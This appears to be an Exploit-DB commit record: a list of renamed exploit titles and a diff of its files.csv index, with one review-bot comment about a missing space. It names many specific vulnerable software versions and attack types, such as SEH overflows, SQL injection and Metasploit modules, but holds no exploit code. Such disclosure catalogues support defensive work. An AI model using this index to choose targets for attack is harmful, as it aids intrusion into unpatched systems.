DB: 2017-09-07

9 new exploits

Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service
Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service

Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)

2WIRE DSL Router (xslt) - Denial of Service
2WIRE DSL Router - 'xslt' Denial of Service

ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)
ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)

Optimal Archive 1.38 - '.zip' File (SEH) (PoC)
Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)

Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)
Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)

Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)
Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)

VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser
VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow

Winlog Lite SCADA HMI system - (SEH) Overwrite
Winlog Lite SCADA HMI system - Overwrite (SEH)

FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)
FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)
Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow

Sambar Server 6.0 - results.stm Post Request Buffer Overflow
Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow

Samba nttrans Reply - Integer Overflow
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)

i.FTP 2.21 - (SEH) Overflow Crash (PoC)
i.FTP 2.21 - Overflow Crash (SEH) (PoC)

Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)
Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)

TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)

Network Scanner 4.0.0.0 - (SEH)Crash (PoC)
Network Scanner 4.0.0.0 - Crash (SEH) (PoC)

Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service
Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)

Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library
Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow

WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales
WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow

Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation

CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)
CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)
Quick Player 1.2 - Unicode Buffer Overflow
DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit
Quick Player 1.2 - Unicode Buffer Overflow (1)
DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)

Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)
Quick Player 1.2 - Unicode Buffer Overflow (2)

Winamp 5.572 - (SEH) Exploit
Winamp 5.572 - Exploit (SEH)

ZipScan 2.2c - (SEH) Exploit
ZipScan 2.2c - Exploit (SEH)

Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)
Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)

Mediacoder 0.7.3.4672 - (SEH) Exploit
Mediacoder 0.7.3.4672 - Exploit (SEH)

SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)
MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)
BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow
MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)

ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)
ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)

MP3 Workstation 9.2.1.1.2 - (SEH) Exploit
MP3 Workstation 9.2.1.1.2 - Exploit (SEH)

DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit
DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)

MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)
MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)

iworkstation 9.3.2.1.4 - (SEH) Exploit
iworkstation 9.3.2.1.4 - Exploit (SEH)

Winamp 5.6 - Arbitrary Code Execution in MIDI Parser
Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution

BS.Player 2.57 - Buffer Overflow (Unicode SEH)
BS.Player 2.57 - Buffer Overflow (SEH Unicode)

Nokia MultiMedia Player 1.0 - (SEH Unicode)
Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)

POP Peeper 3.7 - (SEH) Exploit
POP Peeper 3.7 - Exploit (SEH)

Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)
Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)

BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)
BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)

DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)
DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)

Samba 2.0.7 SWAT - Logfile Permissions
Samba 2.0.7 - SWAT Logfile Permissions

Static HTTP Server 1.0 - (SEH) Overflow
Static HTTP Server 1.0 - Overflow (SEH)

ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)

Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'
Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)

GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)
GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)

Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)
Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)

Total Commander 8.52 - Overwrite (SEH) Buffer Overflow
Total Commander 8.52 - Overwrite Buffer Overflow (SEH)
TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow
TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow
TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)
TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)
Jungo DriverWizard WinDriver - Kernel Pool Overflow
Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation
Tor - Linux Sandbox Breakout via X11

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

Samba 3.0.4 SWAT - Authorisation Buffer Overflow
Samba 3.0.4 - SWAT Authorisation Buffer Overflow

BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal
BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)

Samba 2.2.x - nttrans Overflow (Metasploit)
Samba 2.2.x - 'nttrans' Overflow (Metasploit)

BigAnt Server 2.52 - (SEH) Exploit
BigAnt Server 2.52 - Exploit (SEH)

File Sharing Wizard 1.5.0 - (SEH) Exploit
File Sharing Wizard 1.5.0 - Exploit (SEH)

Samba - 'Username' map script' Command Execution (Metasploit)
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)

Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)
Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

Samba 2.0.7 SWAT - Logging Failure
Samba 2.0.7 - SWAT Logging Failure

Sambar Server 4.4/5.0 - pagecount File Overwrite
Sambar Server 4.4/5.0 - 'pagecount' File Overwrite

Sambar Server 5.x - results.stm Cross-Site Scripting
Sambar Server 5.x - 'results.stm' Cross-Site Scripting

Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow

BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)
BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)

Sambar 5.x - Open Proxy / Authentication Bypass
Sambar Server 5.x - Open Proxy / Authentication Bypass
Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access
Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access

Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting
Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting

Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection
Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection

Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection
Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection
Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection
Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection
Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection
Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection

Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)
Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)

Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)
Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)

Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)

WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures
WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures

PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module
PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection

PHP-decoda - Cross-Site Scripting In Video Tag
PHP-decoda - 'Video Tag' Cross-Site Scripting
vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API
vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting
vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection

Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)

WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'
WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation

FineCMS 1.0  - Multiple Vulnerabilities
FineCMS 1.0 - Multiple Vulnerabilities

A2billing 2.x - SQL Injection
Cory Support - 'pr' Parameter SQL Injection
Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)
Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
Offensive Security 2017-09-07 05:01:26 +00:00
parent 69443c8521
commit a1eeba1263
11 changed files with 1095 additions and 91 deletions

files.csv

@ -438,7 +438,7 @@ id,file,description,date,author,platform,type,port
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0
2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
@ -736,7 +736,7 @@ id,file,description,date,author,platform,type,port
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
@ -846,9 +846,9 @@ id,file,description,date,author,platform,type,port
6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0
6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0
6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0
7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0
7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0
7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0
7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0
7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0
@ -1459,7 +1459,7 @@ id,file,description,date,author,platform,type,port
11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0
11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0
11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0
11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0
11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0
12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0
@ -1602,7 +1602,7 @@ id,file,description,date,author,platform,type,port
13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)",2010-06-22,blake,windows,dos,0
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0
14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080
14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80
@ -1702,7 +1702,7 @@ id,file,description,date,author,platform,type,port
14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0
14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0
14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0
14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
@ -1971,7 +1971,7 @@ id,file,description,date,author,platform,type,port
17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,windows,dos,0
17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0
20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - (SEH) Overwrite",2012-08-29,Ciph3r,windows,dos,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,windows,dos,0
20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0
@ -2697,7 +2697,7 @@ id,file,description,date,author,platform,type,port
21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0
21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0
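Review bot: the rewritten description on the 21826 row drops the space after the separator hyphen: `"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)"` should read `"FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)"` so it matches the `Product Version - Description` form used on every other row in this file (and in the commit message line that announces this rename).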
@ -3060,10 +3060,10 @@ id,file,description,date,author,platform,type,port
23540,platforms/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0
23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0
23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0
23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0
23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0
23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port
23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0
23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0
@ -3549,7 +3549,7 @@ id,file,description,date,author,platform,type,port
27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0
27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0
27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0
27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139
27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139
